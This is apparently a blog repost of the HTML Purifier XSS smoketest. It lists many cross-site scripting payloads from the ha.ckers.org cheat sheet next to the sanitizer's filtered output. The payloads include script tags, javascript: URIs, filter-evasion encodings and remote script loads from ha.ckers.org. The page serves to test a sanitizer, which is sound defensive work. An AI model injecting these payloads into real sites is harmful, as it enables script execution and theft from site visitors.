HTML Purifier XSS Attacks Smoketest (Xss cheat sheet)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.

Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

NameRawOutputRender
XSS Locator 
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//--></S »
CRIPT>">'><SCRIPT>alert(Stri »
ng.fromCharCode(88,83,83))</ »
SCRIPT>=&{}
 
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//--&gt; »
"&gt;'&gt;=&amp;{}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
XSS Quick Test 
'';!--"<XSS>=&{()}
 
'';!--"=&amp;{()}
'';!--"=&{()}
SCRIPT w/Alert() 
<SCRIPT>alert('XSS')</SCRIPT »
>
    
SCRIPT w/Source File 
<SCRIPT »
SRC=http://ha.ckers.org/xss. »
js></SCRIPT>
    
SCRIPT w/Char Code 
<SCRIPT>alert(String.fromCha »
rCode(88,83,83))</SCRIPT>
    
BASE 
<BASE »
HREF="javascript:alert('XSS' »
);//">
    
BGSOUND 
<BGSOUND »
SRC="javascript:alert('XSS') »
;">
    
BODY background-image 
<BODY »
BACKGROUND="javascript:alert »
('XSS');">
    
BODY ONLOAD 
<BODY ONLOAD=alert('XSS')>
    
DIV background-image 1 
<DIV »
STYLE="background-image: »
url(javascript:alert('XSS')) »
">
 
<div></div>
  
DIV background-image 2 
<DIV »
STYLE="background-image: »
url(&#1;javascript:alert('XS »
S'))">
 
<div></div>
  
DIV expression 
<DIV STYLE="width: »
expression(alert('XSS'));">
 
<div></div>
  
FRAME 
<FRAMESET><FRAME »
SRC="javascript:alert('XSS') »
;"></FRAMESET>
    
IFRAME 
<IFRAME »
SRC="javascript:alert('XSS') »
;"></IFRAME>
    
INPUT Image 
<INPUT TYPE="IMAGE" »
SRC="javascript:alert('XSS') »
;">
    
IMG w/JavaScript Directive 
<IMG »
SRC="javascript:alert('XSS') »
;">
    
IMG No Quotes/Semicolon 
<IMG »
SRC=javascript:alert('XSS')>
    
IMG Dynsrc 
<IMG »
DYNSRC="javascript:alert('XS »
S');">
    
IMG Lowsrc 
<IMG »
LOWSRC="javascript:alert('XS »
S');">
    
IMG Embedded commands 1 
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode">
 
<img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciouscode" />
somecommand.php?somevariables=maliciouscode
IMG STYLE w/expression 
exp/*<XSS »
STYLE='no\xss:noxss("*//*"); »

xss:&#101;x&#x2F;*XSS*//*/* »
/pression(alert("XSS"))'>
 
exp/*
exp/*
List-style-image 
<STYLE>li {list-style-image: »
url("javascript:alert('XSS') »
");}</STYLE><UL><LI>XSS
 
<ul><li>XSS</li></ul>
  • XSS
IMG w/VBscript 
<IMG »
SRC='vbscript:msgbox("XSS")' »
>
    
LAYER 
<LAYER »
SRC="http://ha.ckers.org/scr »
iptlet.html"></LAYER>
    
Livescript 
<IMG »
SRC="livescript:[code]">
    
US-ASCII encoding 
scriptalert(XSS)/script »

scriptalert(XSS)/script
scriptalert(XSS)/script
META 
<META HTTP-EQUIV="refresh" »
CONTENT="0;url=javascript:al »
ert('XSS');">
    
META w/data:URL 
<META HTTP-EQUIV="refresh" »
CONTENT="0;url=data:text/htm »
l;base64,PHNjcmlwdD5hbGVydCg »
nWFNTJyk8L3NjcmlwdD4K">
    
META w/additional URL parameter 
<META HTTP-EQUIV="refresh" »
CONTENT="0; »
URL=http://;URL=javascript:a »
lert('XSS');">
    
Mocha 
<IMG SRC="mocha:[code]">
    
OBJECT 
<OBJECT »
TYPE="text/x-scriptlet" »
DATA="http://ha.ckers.org/sc »
riptlet.html"></OBJECT>
    
OBJECT w/Embedded XSS 
<OBJECT »
classid=clsid:ae24fdae-03c6- »
11d1-8b76-0080c744f389><para »
m name=url »
value=javascript:alert('XSS' »
)></OBJECT>
    
Embed Flash 
<EMBED »
SRC="http://ha.ckers.org/xss »
.swf" »
AllowScriptAccess="always">< »
/EMBED>
    
STYLE 
<STYLE »
TYPE="text/javascript">alert »
('XSS');</STYLE>
    
STYLE w/Comment 
<IMG »
STYLE="xss:expr/*XSS*/ession »
(alert('XSS'))">
    
STYLE w/Anonymous HTML 
<XSS »
STYLE="xss:expression(alert( »
'XSS'))">
    
STYLE w/background-image 
<STYLE>.XSS{background-image »
:url("javascript:alert('XSS' »
)");}</STYLE><A »
CLASS=XSS></A>
 
<a class="XSS"></a>
  
STYLE w/background 
<STYLE »
type="text/css">BODY{backgro »
und:url("javascript:alert('X »
SS')")}</STYLE>
    
Stylesheet 
<LINK REL="stylesheet" »
HREF="javascript:alert('XSS' »
);">
    
Remote Stylesheet 1 
<LINK REL="stylesheet" »
HREF="http://ha.ckers.org/xs »
s.css">
    
Remote Stylesheet 2 
<STYLE>@import'http://ha.cke »
rs.org/xss.css';</STYLE>
    
Remote Stylesheet 3 
<META HTTP-EQUIV="Link" »
Content="<http://ha.ckers.or »
g/xss.css>; REL=stylesheet">
    
Remote Stylesheet 4 
<STYLE>BODY{-moz-binding:url »
("http://ha.ckers.org/xssmoz »
.xml#xss")}</STYLE>
    
TABLE 
<TABLE »
BACKGROUND="javascript:alert »
('XSS')"></TABLE>
    
TD 
<TABLE><TD »
BACKGROUND="javascript:alert »
('XSS')"></TD></TABLE>
    
XML namespace 
<HTML xmlns:xss>
<?import »
namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
<xss:xss>X »
SS</xss:xss>

</HTML>
 
&lt;?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc"&gt;
XSS
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS
XML data island w/CDATA 
<XML »
ID=I><X><C><![CDATA[<IMG »
SRC="javas]]><![CDATA[cript: »
alert('XSS');">]]>

</C></X> »
</xml><SPAN DATASRC=#I »
DATAFLD=C DATAFORMATAS=HTML>
 
&lt;IMG »
SRC="javascript:alert('XSS') »
;"&gt;

<span></span>
<IMG SRC="javascript:alert('XSS');">
XML data island w/comment 
<XML ID="xss"><I><B><IMG »
SRC="javas<!-- »
-->cript:alert('XSS')"></B>< »
/I></XML>

<SPAN »
DATASRC="#xss" DATAFLD="B" »
DATAFORMATAS="HTML"></SPAN>
 
<i><b><img src="javas" »
alt="javas&lt;!-- »
--&gt;cript:alert('XSS')" »
/></b></i><span></span>
javas<!-- -->cript:alert('XSS')
XML (locally hosted) 
<XML »
SRC="http://ha.ckers.org/xss »
test.xml" ID=I></XML>
<SPAN »
DATASRC=#I DATAFLD=C »
DATAFORMATAS=HTML></SPAN>
 
<span></span>
  
XML HTML+TIME 
<HTML><BODY>
<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">

<?import »
namespace="t" »
implementation="#default#tim »
e2">
<t:set »
attributeName="innerHTML" »
to="XSS<SCRIPT »
DEFER>alert('XSS')</SCRIPT>" »
> </BODY></HTML>
 
&lt;?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time"&gt;

&lt;?import »
namespace="t" »
implementation="#default#tim »
e2"&gt;
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2">
Commented-out Block 
<!--[if gte IE »
4]>
<SCRIPT>alert('XSS');</S »
CRIPT>
<![endif]-->
    
Cookie Manipulation 
<META »
HTTP-EQUIV="Set-Cookie" »
Content="USERID=<SCRIPT>aler »
t('XSS')</SCRIPT>">
    
Local .htc file 
<XSS STYLE="behavior: »
url(http://ha.ckers.org/xss. »
htc);">
    
Rename .js to .jpg 
<SCRIPT »
SRC="http://ha.ckers.org/xss »
.jpg"></SCRIPT>
    
SSI 
<!--#exec cmd="/bin/echo »
'<SCRIPT SRC'"--><!--#exec »
cmd="/bin/echo »
'=http://ha.ckers.org/xss.js »
></SCRIPT>'"-->
    
PHP 
<? »
echo('<SCR)';
echo('IPT>aler »
t("XSS")</SCRIPT>'); ?>
 
&lt;? echo('alert("XSS")'); »
?&gt;
<? echo('alert("XSS")'); ?>
JavaScript Includes 
<BR SIZE="&{alert('XSS')}">
 
<br />
 
Character Encoding Example 
<
%3C
&lt
&lt;
&LT
&LT;
&#60 »

&#060
&#0060

&#00060
&#000 »
060
&#0000060
&#60;
&#060;
& »
#0060;
&#00060;
&#000060;
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
&#x3c;
&#x03c;

&#x003c; »

&#x0003c;
&#x00003c;
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »

&#X3c;
&#X03c;
&#X003c;
&#X »
0003c;
&#X00003c;
&#X000003c »
;
&#x3C

&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
&#x03C;
&#x003C;
&#x000 »
3C;
&#x00003C;
&#x000003C;
& »
#X3C
&#X03C
&#X003C
&#X0003C »

&#X00003C
&#X000003C

&#X3C »
;
&#X03C;
&#X003C;
&#X0003C; »

&#X00003C;
&#X000003C;
\x3c »

\x3C
\u003c
\u003C
 
&lt;
%3C
&amp;lt
&lt;
&amp;L »
T
&amp;LT;
&lt;
&lt;
&lt;

& »
lt;
&lt;
&lt;
&lt;
&lt;
&lt; »

&lt;
&lt;
&lt;
&lt;
&lt;
&l »
t;
&lt;
&lt;
&lt;
&lt;
&lt;
 »

&lt;
&lt;
&lt;
&lt;
&lt;
&l »
t;
&lt;
&lt;
&lt;
&lt;
&lt;
 »
&lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;

&lt;
&lt;
&lt;
&lt;
&lt;
 »
&lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
&lt;
&lt;
&lt;
&lt;
& »
lt;

&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
\x3c
\x3C
\u003c
\u00 »
3C
< %3C &lt < &LT &LT; < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive 
<IMG »
SRC=JaVaScRiPt:alert('XSS')>
    
HTML Entities 
<IMG »
SRC=javascript:alert(&quot;X »
SS&quot;)>
    
Grave Accents 
<IMG »
SRC=`javascript:alert("RSnak »
e says, 'XSS'")`>
 
<img »
src="%60javascript%3Aalert(" »
alt="`javascript:alert(&quot »
;RSnake" />
`javascript:alert("RSnake
Image w/CharCode 
<IMG »
SRC=javascript:alert(String. »
fromCharCode(88,83,83))>
    
UTF-8 Unicode Encoding 
<IMG »
SRC=&#106;&#97;&#118;&#97;&# »
115;&#99;&#114;&#105;&#112;& »
#116;&#58;&#97;&#108;&#101;& »
#114;&#116;&#40;&#39;&#88;&# »
83;&#83;&#39;&#41;>
    
Long UTF-8 Unicode w/out Semicolons 
<IMG »
SRC=&#0000106&#0000097&#0000 »
118&#0000097&#0000115&#00000 »
99&#0000114&#0000105&#000011 »
2&#0000116&#0000058&#0000097 »
&#0000108&#0000101&#0000114& »
#0000116&#0000040&#0000039&# »
0000088&#0000083&#0000083&#0 »
000039&#0000041>
    
DIV w/Unicode 
<DIV »
STYLE="background-image:\007 »
5\0072\006C\0028'\006a\0061\ »
0076\0061\0073\0063\0072\006 »
9\0070\0074\003a\0061\006c\0 »
065\0072\0074\0028.1027\0058 »
.1053\0053\0027\0029'\0029">
 
<div></div>
  
Hex Encoding w/out Semicolons 
<IMG »
SRC=&#x6A&#x61&#x76&#x61&#x7 »
3&#x63&#x72&#x69&#x70&#x74&# »
x3A&#x61&#x6C&#x65&#x72&#x74 »
&#x28&#x27&#x58&#x53&#x53&#x »
27&#x29>
    
UTF-7 Encoding 
<HEAD><META »
HTTP-EQUIV="CONTENT-TYPE" »
CONTENT="text/html; »
charset=UTF-7"> »
</HEAD>+ADw-SCRIPT+AD4-alert »
('XSS');+ADw-/SCRIPT+AD4-
 
+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes 
\";alert('XSS');//
 
\";alert('XSS');//
\";alert('XSS');//
End title tag 
</TITLE><SCRIPT>alert("XSS") »
;</SCRIPT>
    
STYLE w/broken up JavaScript 
<STYLE>@im\port'\ja\vasc\rip »
t:alert("XSS")';</STYLE>
    
Embedded Tab 
<IMG »
SRC="jav\tascript:alert('XSS' »
);">
 
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Encoded Tab 
<IMG »
SRC="jav&#x09;ascript:alert( »
'XSS');">
 
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Newline 
<IMG »
SRC="jav&#x0A;ascript:alert( »
'XSS');">
 
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Carriage Return 
<IMG »
SRC="jav&#x0D;ascript:alert( »
'XSS');">
 
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Multiline w/Carriage Returns 
<IMG
SRC
=
"
j
a
v
a
s
c
r
i »

p
t
:
a
l
e
r
t
(
'
X
S
S
' »

)
"
>

<img »
src="j%20a%20v%20a%20s%20c%2 »
0r%20i%20p%20t%20%3A%20a%20l »
%20e%20r%20t%20(%20'%20X%20S »
%20S%20'%20)" alt="j a v a s »
c r i p t : a l e r t ( ' X »
S S ' )" />
j a v a s c r i p t : a l e r t ( ' X S S ' )
Null Chars 1 
<IMG »
SRC=java\0script:alert("XSS") »
>
    
Null Chars 2 
&<SCR\0IPT>alert("XSS")</SCR\0 »
IPT>
 
&amp;
&
Spaces/Meta Chars 
<IMG SRC=" &#14;  »
javascript:alert('XSS');">
 
<img src="" alt="" />
Non-Alpha/Non-Digit 
<SCRIPT/XSS »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
Non-Alpha/Non-Digit Part 2 
<BODY »
onload!#$%&()*~+-_.,:;?@[/|\ »
]^`=alert("XSS")>
    
No Closing Script Tag 
<SCRIPT »
SRC=http://ha.ckers.org/xss. »
js
    
Protocol resolution in script tags 
<SCRIPT »
SRC=//ha.ckers.org/.j>
    
Half-Open HTML/JavaScript 
<IMG »
SRC="javascript:alert('XSS') »
"
    
Double open angle brackets 
<IFRAME »
SRC=http://ha.ckers.org/scri »
ptlet.html <
    
Extraneous Open Brackets 
<<SCRIPT>alert("XSS");//<</S »
CRIPT>
 
&lt;
<
Malformed IMG Tags 
<IMG »
"""><SCRIPT>alert("XSS")</SC »
RIPT>">
 
"&gt;
">
No Quotes/Semicolons 
<SCRIPT>a=/XSS/
alert(a.sour »
ce)</SCRIPT>
    
Evade Regex Filter 1 
<SCRIPT a=">" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
Evade Regex Filter 2 
<SCRIPT ="blah" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
Evade Regex Filter 3 
<SCRIPT a="blah" '' »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
Evade Regex Filter 4 
<SCRIPT "a='>'" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
Evade Regex Filter 5 
<SCRIPT a=`>` »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
Filter Evasion 1 
<SCRIPT>document.write("<SCR »
I");</SCRIPT>PT »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
 
PT »
SRC="http://ha.ckers.org/xss »
.js"&gt;
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2 
<SCRIPT a=">'>" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
    
IP Encoding 
<A »
HREF="http://66.102.7.147/"> »
XSS</A>
 
<a »
href="http://66.102.7.147/"> »
XSS</a>
XSS
URL Encoding 
<A »
HREF="http://%77%77%77%2E%67 »
%6F%6F%67%6C%65%2E%63%6F%6D" »
>XSS</A>
 
<a>XSS</a>
XSS
Dword Encoding 
<A »
HREF="http://1113982867/">XS »
S</A>
 
<a »
href="http://1113982867/">XS »
S</a>
XSS
Hex Encoding 
<A »
HREF="http://0x42.0x0000066. »
0x7.0x93/">XSS</A>
 
<a »
href="http://0x42.0x0000066. »
0x7.0x93/">XSS</a>
XSS
Octal Encoding 
<A »
HREF="http://0102.0146.0007. »
00000223/">XSS</A>
 
<a »
href="http://0102.0146.0007. »
00000223/">XSS</a>
XSS
Mixed Encoding 
<A »
HREF="h
tt\tp://6&#09;6.00014 »
6.0x7.147/">XSS</A>
 
<a »
href="h%20tt%20p%3A//6%206.0 »
00146.0x7.147/">XSS</a>
XSS
Protocol Resolution Bypass 
<A »
HREF="//www.google.com/">XSS »
</A>
 
<a>XSS</a>
XSS
Firefox Lookups 1 
<A HREF="//google">XSS</A>
 
<a href="//google">XSS</a>
XSS
Firefox Lookups 2 
<A »
HREF="http://ha.ckers.org@go »
ogle">XSS</A>
 
<a »
href="http://google">XSS</a>
XSS
Firefox Lookups 3 
<A »
HREF="http://google:ha.ckers »
.org">XSS</A>
 
<a »
href="http://google">XSS</a>
XSS
Removing Cnames 
<A »
HREF="http://google.com/">XS »
S</A>
 
<a>XSS</a>
XSS
Extra dot for Absolute DNS 
<A »
HREF="http://www.google.com. »
/">XSS</A>
 
<a>XSS</a>
XSS
JavaScript Link Location 
<A »
HREF="javascript:document.lo »
cation='http://www.google.co »
m/'">XSS</A>
 
<a>XSS</a>
XSS
Content Replace 
<A »
HREF="http://www.gohttp://ww »
w.google.com/ogle.com/">XSS< »
/A>
 
<a »
href="http://www.gohttp//www »
.google.com/ogle.com/">XSS</ »
a>
XSS

 

作者:Chuck Lu    GitHub
posted @   ChuckLu  阅读(89)  评论(0编辑  收藏  举报
编辑推荐:
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
历史上的今天:
2019-09-03 Resize image online 调整图片大小
2019-09-03 Resend a Request by fiddler
2019-09-03 .NET Standard
2016-09-03 git -C
2016-09-03 Common Macros for Build Commands and Properties
2016-09-03 Hearthstone-Deck-Tracker项目的编译
2014-09-03 TeeChart的网络资料
点击右上角即可分享
微信分享提示